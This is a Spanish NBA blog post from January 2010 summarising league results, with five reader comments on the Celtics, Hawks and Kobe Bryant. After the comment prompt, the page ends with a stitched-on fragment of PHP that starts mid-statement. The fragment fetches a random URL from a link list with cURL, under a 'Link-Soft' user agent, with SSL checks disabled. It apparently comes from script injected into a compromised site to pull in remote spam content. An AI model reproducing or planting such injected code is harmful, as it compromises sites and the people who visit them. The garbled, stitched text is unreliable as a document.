La Minicrónica (29/01/10)

30 de January de 2010 por TheDeerHunter

Los Cavs se escapan en el Este. Menudo mal trago que es enfrentarse en estos momentos a ellos y sino que se lo pregunten a Indiana, cuyo máximo anotador fue Granger con 13 puntos. LeBron rozó el triple doble y Shaq se comió a Hibbert vivo. Resultado: 7 victorias y subiendo. Calendario cómodo hasta después del all-star, donde posiblemente habrán recuperado a Mo y Powe… y quién sabe si habrán pescado en el mercado de invierno.

Mientras los Celtics se hunden. Hacía más de 10 años que los Hawks no les ganaban su serie particular en temporada regular. Ayer les endosaron la 3ª derrota este curso con más facilidad de lo esperado. Joe Johnson y Crawford volvieron a mostrarse indefendibles (¿un dejà vú?) y sólo Pierce dio la cara por parte de los verdes. Los Hawks se ponen segundos del Este y que a nadie le extrañe si los Celtics caen hasta la 4ª plaza en caso de perder el domingo contra los Lakers que ya están terminando su temida gira. Si ganan a Boston ya se pueden dar con un canto en los dientes. Anoche no tuvieron que sudar mucho en Philadelphia aunque para mantener la tradición Iverson les hizo un traje marcado por Fisher.

A los amarillos les vino muy bien la derrota de los Nuggets en Oklahoma. Hacía tiempo que nadie dejaba a los de George Karl en 80 puntos. Aunque la baja de Carmelo se tiene que notar el nivel defensivo de los Thunder es más que notable. Debéis ver el tapón de Durant con un pie descalzo. Pedazo de jugón (aquí creo que hubieran anulado la jugada).

En la saturada cola de playoffs del Oeste, los Jazz ganaron a los Kings sin Deron y Boozer, aunque con Millsap y Kirilenko estelares. Por los Kings ya sólo juegan dos. Los Blazers perdieron esta vez contra los Rockets. Rudy estuvo INMENSO, con mayúsculas… pero aún con todo 5 hombres jugaron bastante más que él y dos más un minutaje parecido. Los Rockets aguantaron como pudieron sus arremetidas ganando el partido desde los tiros libres. En cambio, Marc estuvo algo flojito en el pasito atrás que dieron los Grizzlies en San Antonio donde los Spurs jugaron francamente bien aún sin Parker.

También se vieron frenados los Hornets frente los Bulls en casa. Engordar para morir. Lograron la machada en el último cuarto para forzar la prórroga pero luego les faltó pegada para culminar la remontada.

Para ir terminando, los Bobcats ganaron en Oakland, los Heat le dieron una paliza a los Pistons, los Clippers palmaron en Minnesotta y los Nets estuvieron a punto de volver a ganar a los Wizards.

Comenta

5 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Los Celtics necesitan urgentemente el parón del All-Star, Garnett está al 10% de sus posibilidades, en la última canasta de Orlando frente a ellos, Lewis se va de el sin ningun problema. Pierce ahora mismo vive de su calidad pura y dura, también esta físicamente mal. Rondo y Perkins estan haciendo un temporadón, a la espera de que los jefes vuelvan al máximo nivel.

    Y lo mismo digo de Kobe, a ver si puede ser que juegue poquísimo en el All-Star, que también necesita descanso.

      Citar

  2. HeiNeKeN dice:
    #2

    Vi el partido de los Hawks-Celtics y hacia mucho que no veia unos cuartos jugados de tan distinta forma…

    En el 1º cuarto “dominio” Celtic, los Hawks fallandolo todo y en los 3 ultimos minutos Crawford y Pachulia empezaron a liarla y remontaron (con canaston de Jamaal desde medio campo).
    En el 2º cuarto los Hawks arrollando con los suplentes.
    En el 3º cuarto ambos equipos mas preocupados en darse palos que en meter canastas.
    Final del 3º y luego todo el 4º cuarto, aparece al fin Joe Johnson (que iba con un 2/11 en tiros) y acaba metiendo todo lo que tira.

      Citar

  3. Love Denise dice:
    #3

    Alguien sabe por que razon Kobe es tan silvado en su ciudad natal Philly? Ha hecho algun comentario despectivo sobre la ciudad o el equipo, o simplemente es por pura envidia?

      Citar

  4. PIRATA dice:
    #4

    Pués yo vi el Philly-Lakers y la gritaban MVP mientras tiraba tiros libres.

      Citar

  5. HeiNeKeN dice:
    #5

    Love Denise, segun creo, hace algun tiempo le preguntaron a Kobe si le gustaria jugar alguna vez para los Sixers y creo que respondio que no y por ello no era del todo bien recibido en Philadelphia…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>